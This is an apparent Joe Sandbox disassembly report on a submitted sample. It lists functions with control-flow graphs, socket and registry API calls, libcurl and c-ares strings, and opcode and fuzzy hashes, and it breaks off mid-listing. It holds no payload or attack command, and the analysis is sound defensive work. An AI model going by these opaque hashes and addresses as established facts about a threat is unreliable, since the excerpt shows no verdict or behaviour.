                                                                • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                                • API String ID: 4217438148-1047472027
                                                                • Opcode ID: 598e731e1bbb6d458df908e14c4fdacde285ff4f6460b708adf3b77b76d2dcee
                                                                • Instruction ID: 6de138747716866c6fe9dd1331c814f560ee411262f88c7b78495147b0dae73e
                                                                • Opcode Fuzzy Hash: 598e731e1bbb6d458df908e14c4fdacde285ff4f6460b708adf3b77b76d2dcee
                                                                • Instruction Fuzzy Hash: 6872EEB1604301ABE7209B24CC91B6BB7E8FF85740F14482EF98597391EB78E954CB97
                                                                Function 0045A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0045A832
                                                                Strings
                                                                • @, xrefs: 0045AC42
                                                                • bind failed with errno %d: %s, xrefs: 0045B080
                                                                • @, xrefs: 0045A8F4
                                                                • cf-socket.c, xrefs: 0045A5CD, 0045A735
                                                                • Bind to local port %d failed, trying next, xrefs: 0045AFE5
                                                                • Local Interface %s is ip %s using address family %i, xrefs: 0045AE60
                                                                • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0045A6CE
                                                                • Local port: %hu, xrefs: 0045AF28
                                                                • cf_socket_open() -> %d, fd=%d, xrefs: 0045A796
                                                                • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0045AD0A
                                                                • Trying %s:%d..., xrefs: 0045A7C2, 0045A7DE
                                                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 0045ADAC
                                                                • Could not set TCP_NODELAY: %s, xrefs: 0045A871
                                                                • Trying [%s]:%d..., xrefs: 0045A689
                                                                • Couldn't bind to '%s' with errno %d: %s, xrefs: 0045AE1F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: setsockopt
                                                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                                • API String ID: 3981526788-2373386790
                                                                • Opcode ID: eb9773b206132948b02404539ac1df4480f87d3f6ed0f8e79d6d5d2da541db6e
                                                                • Instruction ID: 03e52c36aa13339ee7becb8e5ec3fe8f7015e7babc84f4dbfc28b9e89af2c1fd
                                                                • Opcode Fuzzy Hash: eb9773b206132948b02404539ac1df4480f87d3f6ed0f8e79d6d5d2da541db6e
                                                                • Instruction Fuzzy Hash: 84620571504341ABE720CF14C846BABB7E5BF84305F044A1EFD8897292E779E859CB97
                                                                Function 004E9740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 954 4e9740-4e975b 955 4e975d-4e9768 call 4e78a0 954->955 956 4e9780-4e9782 954->956 965 4e976e-4e9770 955->965 966 4e99bb-4e99c0 955->966 957 4e9788-4e97a0 call 7a8e00 call 4e78a0 956->957 958 4e9914-4e994e call 7a8b70 RegOpenKeyExA 956->958 957->966 971 4e97a6-4e97c5 957->971 969 4e995a-4e9992 RegQueryValueExA RegCloseKey call 7a8b98 958->969 970 4e9950-4e9955 958->970 965->971 972 4e9772-4e977e 965->972 967 4e9a0c-4e9a15 966->967 984 4e9997-4e99b5 call 4e78a0 969->984 970->967 977 4e9827-4e9833 971->977 978 4e97c7-4e97e0 971->978 972->957 980 4e985f-4e9872 call 4e5ca0 977->980 981 4e9835-4e985c call 4de2b0 * 2 977->981 982 4e97f6-4e9809 978->982 983 4e97e2-4e97f3 call 7a8b50 978->983 994 4e9878-4e987d call 4e77b0 980->994 995 4e99f0 980->995 981->980 982->977 993 4e980b-4e9810 982->993 983->982 984->966 984->971 993->977 997 4e9812-4e9822 993->997 1001 4e9882-4e9889 994->1001 1000 4e99f5-4e99fb call 4e5d00 995->1000 997->967 1009 4e99fe-4e9a09 1000->1009 1001->1000 1005 4e988f-4e989b call 4d4fe0 1001->1005 1005->995 1013 4e98a1-4e98c3 call 7a8b50 call 4e78a0 1005->1013 1009->967 1018 4e98c9-4e98db call 4de2d0 1013->1018 1019 4e99c2-4e99ed call 4de2b0 * 2 1013->1019 1018->1019 1024 4e98e1-4e98f0 call 4de2d0 1018->1024 1019->995 1024->1019 1029 4e98f6-4e9905 call 4e63f0 1024->1029 1034 4e990b-4e990f 1029->1034 1035 4e9f66-4e9f7f call 4e5d00 1029->1035 1037 4e9a3f-4e9a5a call 4e6740 call 4e63f0 1034->1037 1035->1009 1037->1035 1043 4e9a60-4e9a6e call 4e6d60 1037->1043 1046 4e9a1f-4e9a39 call 4e6840 call 4e63f0 1043->1046 1047 4e9a70-4e9a94 call 4e6200 call 4e67e0 call 4e6320 1043->1047 1046->1035 1046->1037 1058 4e9a16-4e9a19 1047->1058 1059 4e9a96-4e9ac6 call 4dd120 1047->1059 1058->1046 1060 4e9fc1 1058->1060 1065 4e9ac8-4e9adb call 4dd120 1059->1065 1066 4e9ae1-4e9af7 call 4dd190 1059->1066 1062 4e9fc5-4e9ffd call 4e5d00 call 4de2b0 * 2 1060->1062 1062->1009 1065->1046 1065->1066 1066->1046 1072 4e9afd-4e9b09 call 4d4fe0 1066->1072 1072->1060 1078 4e9b0f-4e9b29 call 4de730 1072->1078 1083 4e9b2f-4e9b3a call 4e78a0 1078->1083 1084 4e9f84-4e9f88 1078->1084 1083->1084 1091 4e9b40-4e9b54 call 4de760 1083->1091 1086 4e9f95-4e9f99 1084->1086 1088 4e9f9b-4e9f9e 1086->1088 1089 4e9fa0-4e9fb6 call 4debf0 * 2 1086->1089 1088->1060 1088->1089 1101 4e9fb7-4e9fbe 1089->1101 1097 4e9f8a-4e9f92 1091->1097 1098 4e9b5a-4e9b6e call 4de730 1091->1098 1097->1086 1104 4e9b8c-4e9b97 call 4e63f0 1098->1104 1105 4e9b70-4ea004 1098->1105 1101->1060 1113 4e9b9d-4e9bbf call 4e6740 call 4e63f0 1104->1113 1114 4e9c9a-4e9cab call 4dea00 1104->1114 1110 4ea015-4ea01d 1105->1110 1111 4ea01f-4ea022 1110->1111 1112 4ea024-4ea045 call 4debf0 * 2 1110->1112 1111->1062 1111->1112 1112->1062 1113->1114 1132 4e9bc5-4e9bda call 4e6d60 1113->1132 1121 4e9f31-4e9f35 1114->1121 1122 4e9cb1-4e9ccd call 4dea00 call 4de960 1114->1122 1126 4e9f37-4e9f3a 1121->1126 1127 4e9f40-4e9f61 call 4debf0 * 2 1121->1127 1140 4e9ccf 1122->1140 1141 4e9cfd-4e9d0e call 4de960 1122->1141 1126->1046 1126->1127 1127->1046 1132->1114 1143 4e9be0-4e9bf4 call 4e6200 call 4e67e0 1132->1143 1145 4e9cd1-4e9cec call 4de9f0 call 4de4a0 1140->1145 1151 4e9d53-4e9d55 1141->1151 1152 4e9d10 1141->1152 1143->1114 1160 4e9bfa-4e9c0b call 4e6320 1143->1160 1165 4e9cee-4e9cfb call 4de9d0 1145->1165 1166 4e9d47-4e9d51 1145->1166 1158 4e9e69-4e9e8e call 4dea40 call 4de440 1151->1158 1155 4e9d12-4e9d2d call 4de9f0 call 4de4a0 1152->1155 1183 4e9d2f-4e9d3c call 4de9d0 1155->1183 1184 4e9d5a-4e9d6f call 4de960 1155->1184 1179 4e9e94-4e9eaa call 4de3c0 1158->1179 1180 4e9e90-4e9e92 1158->1180 1176 4e9b75-4e9b86 call 4dea00 1160->1176 1177 4e9c11-4e9c1c call 4e7b70 1160->1177 1165->1141 1165->1145 1171 4e9dca-4e9ddb call 4de960 1166->1171 1188 4e9e2e-4e9e36 1171->1188 1189 4e9ddd-4e9ddf 1171->1189 1176->1104 1198 4e9f2d 1176->1198 1177->1104 1201 4e9c22-4e9c33 call 4de960 1177->1201 1207 4ea04a-4ea04c 1179->1207 1208 4e9eb0-4e9eb1 1179->1208 1186 4e9eb3-4e9ec4 call 4de9c0 1180->1186 1183->1155 1210 4e9d3e-4e9d42 1183->1210 1203 4e9dc2 1184->1203 1204 4e9d71-4e9d73 1184->1204 1186->1046 1215 4e9eca-4e9ed0 1186->1215 1194 4e9e3d-4e9e5b call 4debf0 * 2 1188->1194 1195 4e9e38-4e9e3b 1188->1195 1197 4e9e06-4e9e21 call 4de9f0 call 4de4a0 1189->1197 1205 4e9e5e-4e9e67 1194->1205 1195->1194 1195->1205 1238 4e9e23-4e9e2c call 4deac0 1197->1238 1239 4e9de1-4e9dee call 4dec80 1197->1239 1198->1121 1224 4e9c66-4e9c75 call 4e78a0 1201->1224 1225 4e9c35 1201->1225 1203->1171 1213 4e9d9a-4e9db5 call 4de9f0 call 4de4a0 1204->1213 1205->1158 1205->1186 1218 4ea04e-4ea051 1207->1218 1219 4ea057-4ea070 call 4debf0 * 2 1207->1219 1208->1186 1210->1158 1254 4e9db7-4e9dc0 call 4deac0 1213->1254 1255 4e9d75-4e9d82 call 4dec80 1213->1255 1222 4e9ee5-4e9ef2 call 4de9f0 1215->1222 1218->1060 1218->1219 1219->1101 1222->1046 1241 4e9ef8-4e9f0e call 4de440 1222->1241 1246 4e9c7b-4e9c8f call 4de7c0 1224->1246 1247 4ea011 1224->1247 1233 4e9c37-4e9c51 call 4de9f0 1225->1233 1233->1104 1264 4e9c57-4e9c64 call 4de9d0 1233->1264 1257 4e9df1-4e9e04 call 4de960 1238->1257 1239->1257 1262 4e9ed2-4e9edf call 4de9e0 1241->1262 1263 4e9f10-4e9f26 call 4de3c0 1241->1263 1246->1104 1267 4e9c95-4ea00e 1246->1267 1247->1110 1271 4e9d85-4e9d98 call 4de960 1254->1271 1255->1271 1257->1188 1257->1197 1262->1046 1262->1222 1263->1262 1280 4e9f28 1263->1280 1264->1224 1264->1233 1267->1247 1271->1203 1271->1213 1280->1060
                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004E9946
                                                                • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 004E9974
                                                                • RegCloseKey.KERNELBASE(?), ref: 004E998B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                                • API String ID: 3677997916-615551945
                                                                • Opcode ID: 79ca15e46342b3ba6da07b2066d96c1c7e66a83276c096c8df3f9c3aa19f6d36
                                                                • Instruction ID: 0e757516288238e67cd9b3eb1675fc50d21775518f6f864b8aae02c9bf9970f5
                                                                • Opcode Fuzzy Hash: 79ca15e46342b3ba6da07b2066d96c1c7e66a83276c096c8df3f9c3aa19f6d36
                                                                • Instruction Fuzzy Hash: A632C6F5900241ABEB10AB27EC52A1B76D4AF50319F08443BF8499A393FB39ED14C75B
                                                                Function 00458B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1282 458b50-458b69 1283 458be6 1282->1283 1284 458b6b-458b74 1282->1284 1285 458be9 1283->1285 1286 458b76-458b8d 1284->1286 1287 458beb-458bf2 1284->1287 1285->1287 1288 458bf3-458bfe call 45a550 1286->1288 1289 458b8f-458ba7 call 436e40 1286->1289 1296 458de4-458def 1288->1296 1297 458c04-458c08 1288->1297 1294 458bad-458baf 1289->1294 1295 458cd9-458d16 SleepEx getsockopt 1289->1295 1298 458bb5-458bb9 1294->1298 1299 458ca6-458cb0 1294->1299 1300 458d22 1295->1300 1301 458d18-458d20 1295->1301 1302 458df5-458e19 call 45a150 1296->1302 1303 458e8c-458e95 1296->1303 1304 458dbd-458dc3 1297->1304 1305 458c0e-458c1d 1297->1305 1298->1287 1307 458bbb-458bc2 1298->1307 1299->1295 1306 458cb2-458cb8 1299->1306 1308 458d26-458d39 1300->1308 1301->1308 1338 458e88 1302->1338 1339 458e1b-458e26 1302->1339 1309 458e97-458e9c 1303->1309 1310 458f00-458f06 1303->1310 1304->1285 1312 458c35-458c48 call 45a150 1305->1312 1313 458c1f-458c30 connect 1305->1313 1315 458ddc-458dde 1306->1315 1316 458cbe-458cd4 call 45b180 1306->1316 1307->1287 1317 458bc4-458bcc 1307->1317 1319 458d43-458d61 call 43d8c0 call 45a150 1308->1319 1320 458d3b-458d3d 1308->1320 1321 458edf-458eef call 4278b0 1309->1321 1322 458e9e-458eb6 call 432a00 1309->1322 1310->1287 1340 458c4d-458c4f 1312->1340 1313->1312 1315->1285 1315->1296 1316->1296 1325 458bd4-458bda 1317->1325 1326 458bce-458bd2 1317->1326 1350 458d66-458d74 1319->1350 1320->1315 1320->1319 1342 458ef2-458efc 1321->1342 1322->1321 1337 458eb8-458edd call 433410 * 2 1322->1337 1325->1287 1333 458bdc-458be1 1325->1333 1326->1287 1326->1325 1341 458dac-458db8 call 4650a0 1333->1341 1337->1342 1338->1303 1345 458e2e-458e85 call 43d090 call 464fd0 1339->1345 1346 458e28-458e2c 1339->1346 1347 458c51-458c58 1340->1347 1348 458c8e-458c93 1340->1348 1341->1287 1342->1310 1345->1338 1346->1338 1346->1345 1347->1348 1354 458c5a-458c62 1347->1354 1356 458c99-458c9f 1348->1356 1357 458dc8-458dd9 call 45b100 1348->1357 1350->1287 1351 458d7a-458d81 1350->1351 1351->1287 1358 458d87-458d8f 1351->1358 1360 458c64-458c68 1354->1360 1361 458c6a-458c70 1354->1361 1356->1299 1357->1315 1363 458d91-458d95 1358->1363 1364 458d9b-458da1 1358->1364 1360->1348 1360->1361 1361->1348 1367 458c72-458c8b call 4650a0 1361->1367 1363->1287 1363->1364 1364->1287 1369 458da7 1364->1369 1367->1348 1369->1341
                                                                APIs
                                                                • connect.WS2_32(?,?,00000001), ref: 00458C30
                                                                • SleepEx.KERNELBASE(00000000,00000000), ref: 00458CF3
                                                                • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00458D0F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: Sleepconnectgetsockopt
                                                                • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                                • API String ID: 1669343778-879669977
                                                                • Opcode ID: c99b50ba43529cf1203ff6b68cfd2b76368e3d019f6793d5f8adab50f19c9ed7
                                                                • Instruction ID: 60f233bbefce15487ec20a9bcd5ac323715aa20b9582bc1dca2d3e352feb6494
                                                                • Opcode Fuzzy Hash: c99b50ba43529cf1203ff6b68cfd2b76368e3d019f6793d5f8adab50f19c9ed7
                                                                • Instruction Fuzzy Hash: 6DB19D70604305ABEB10CF24C985BA777E4AF45319F04852EEC59AA393DF78E85CCB56
                                                                Function 00422F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1468 422f17-422f8c call 8a0df0 call 8a11e0 1473 4231c9-4231cd 1468->1473 1474 4231d3-4231d6 1473->1474 1475 422f91-422ff4 call 421619 RegOpenKeyExA 1473->1475 1478 4231c5 1475->1478 1479 422ffa-42300b 1475->1479 1478->1473 1480 42315c-4231ac RegEnumKeyExA 1479->1480 1481 4231b2-4231c2 1480->1481 1482 423010-423083 call 421619 RegOpenKeyExA 1480->1482 1481->1478 1486 423089-4230d4 RegQueryValueExA 1482->1486 1487 42314e-423152 1482->1487 1488 4230d6-423137 call 8a10c0 call 8a1150 call 8a11e0 call 8a0ff0 call 8a11e0 call 89f560 1486->1488 1489 42313b-42314b RegCloseKey 1486->1489 1487->1480 1488->1489 1489->1487
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: EnumOpen
                                                                • String ID: d
                                                                • API String ID: 3231578192-2564639436
                                                                • Opcode ID: 57e0f455b5423d79f54ef88da549d843b53a82df77f1a2b990fc8517bd1915d5
                                                                • Instruction ID: 286cd68e4ccfe73279d446658d9a41e9ff1ff53f75d1a86de6b320ffc5f173ed
                                                                • Opcode Fuzzy Hash: 57e0f455b5423d79f54ef88da549d843b53a82df77f1a2b990fc8517bd1915d5
                                                                • Instruction Fuzzy Hash: 9971B4B49043199FDB50DF69D98479EBBF0FF85308F00885DE89897341E7789A898F92
                                                                Function 004276A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1502 4276a0-4276be 1503 4276c0-4276c7 1502->1503 1504 4276e6-4276f2 send 1502->1504 1503->1504 1505 4276c9-4276d1 1503->1505 1506 4276f4-427709 call 4272a0 1504->1506 1507 42775e-427762 1504->1507 1508 4276d3-4276e4 1505->1508 1509 42770b-427759 call 4272a0 call 42cb20 call 7a8c50 1505->1509 1506->1507 1508->1506 1509->1507
                                                                APIs
                                                                • send.WS2_32(multi.c,?,?,?,N=B,00000000,?,?,004307BF), ref: 004276EB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.0000000000B63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424718261.0000000000B66000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000B68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000E0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424735414.0000000000EF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425042232.0000000000EF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425165243.00000000010B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1425184734.00000000010B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_420000_2M43DSi2cx.jbxd
                                                                Similarity
                                                                • API ID: send
                                                                • String ID: LIMIT %s:%d %s reached memlimit$N=B$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                                • API String ID: 2809346765-2025329211
                                                                • Opcode ID: 5460e84d55d8f64c3ae6344df08f9ebc5ea5a703945c332d73c26f38d77b9b33
                                                                • Instruction ID: e8e2f5a69888ec701a6da2f6bab30a68516d673675c13a43a07bdc5782ece158
                                                                • Opcode Fuzzy Hash: 5460e84d55d8f64c3ae6344df08f9ebc5ea5a703945c332d73c26f38d77b9b33
                                                                • Instruction Fuzzy Hash: 0E110DB17093247BD1209715FC4AE2B7B5CDBC1B68F840A59FC0853382D5659C01C6F6
                                                                Function 00459290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1621 459290-4592ed call 4276a0 1624 4593c3-4593ce 1621->1624 1625 4592f3-4592fb 1621->1625 1632 4593e5-459427 call 43d090 call 464f40 1624->1632 1633 4593d0-4593e1 1624->1633 1626 459301-459333 call 43d8c0 call 43d9a0 1625->1626 1627 4593aa-4593af 1625->1627 1645 459335-459364 WSAIoctl 1626->1645 1646 4593a7 1626->1646 1630 4593b5-4593bc 1627->1630 1631 459456-459470 1627->1631 1635 4593be 1630->1635 1636 459429-459431 1630->1636 1632->1631 1632->1636 1633->1630 1637 4593e3 1633->1637 1635->1631 1640 459433-459437 1636->1640 1641 459439-45943f 1636->1641 1637->1631 1640->1631 1640->1641 1641->1631 1644 459441-459453 call 4650a0 1641->1644 1644->1631 1649 459366-45936f 1645->1649 1650 45939b-4593a4 1645->1650 1646->1627 1649->1650 1653 459371-459390 setsockopt 1649->1653 1650->1646 1653->1650 1654 459392-459395 1653->1654 1654->1650
                                                                APIs
                                                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0045935D
                                                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00459389
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1424245644.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                • Associated: 00000000.00000002.1424227343.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
